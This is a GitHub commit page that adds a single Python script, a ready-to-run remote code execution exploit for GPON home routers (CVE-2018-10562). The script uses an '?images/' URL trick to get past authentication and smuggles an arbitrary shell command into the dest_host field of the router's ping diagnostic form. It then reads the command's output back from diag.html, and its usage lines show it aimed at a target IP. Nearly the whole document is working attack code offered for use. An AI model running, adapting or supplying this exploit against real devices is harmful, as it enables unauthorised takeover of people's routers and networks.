Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 3bddb2c

Browse files
authored
Add files via upload
First commit
1 parent 7fdeb0d commit 3bddb2c

1 file changed

Lines changed: 77 additions & 0 deletions

File tree

gpon_rce.py.py

Lines changed: 77 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,77 @@
1+
#!/usr/bin/env python
2+
3+
import sys
4+
import requests
5+
import time
6+
import urllib2
7+
import re
8+
import ssl
9+
10+
ctx = ssl.create_default_context()
11+
ctx.check_hostname = False
12+
ctx.verify_mode = ssl.CERT_NONE
13+
14+
15+
def banner():
16+
ascii_art = """
17+
18+
________________________________________________________________
19+
20+
[*] GPON Remote Code Execution (CVE-2018-10562) [*]
21+
________________________________________________________________
22+
23+
Coded by F3D
24+
Twitter: @f3d_0x0
25+
Medium: medium.com/@0xf3d
26+
________________________________________________________________
27+
28+
"""
29+
print ascii_art
30+
31+
def retrieve_results(target, command):
32+
try:
33+
fp = urllib2.urlopen(target + '/diag.html?images/', context=ctx)
34+
for line in fp.readlines():
35+
if 'diag_result = \"Can\'t resolv hostname for' in line:
36+
start = '['
37+
end = ';' + command +']'
38+
res = str(line[line.find(start)+len(start):line.rfind(end)])
39+
return res.replace('\\n', '\n')
40+
except Exception as e:
41+
print "[DEBUG] " + str(e) + '\n'
42+
print "[*] An error occured while retriving the result"
43+
44+
def send_command(url_bypass, payload):
45+
print "[*] Injecting command.."
46+
try:
47+
req = requests.Request('POST', url_bypass, data=payload)
48+
prepared = req.prepare()
49+
s = requests.Session()
50+
s.send(prepared)
51+
except Exception as e:
52+
pass
53+
54+
55+
if __name__ == "__main__":
56+
try:
57+
58+
banner()
59+
60+
domain = sys.argv[1]
61+
command = sys.argv[2]
62+
63+
url_bypass = domain + '/GponForm/diag_Form?images/'
64+
payload = 'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`' + command + '`;' + command + '&ipv=0'
65+
send_command(url_bypass, payload)
66+
print "[*] Waiting for results..zZz.."
67+
time.sleep(3)
68+
print "[*] Getting the results.."
69+
out = retrieve_results(domain, command)
70+
print ""
71+
print out
72+
print ""
73+
74+
except Exception as e:
75+
print "[DEBUG] " + str(e) + '\n'
76+
print "[ERROR] Usage: python gpon_rce.py TARGET_URL COMMAND"
77+
print "[ERROR] e.g. : python gpon_rce.py http://192.168.1.15 \'id\'\n"

0 commit comments

Comments
 (0)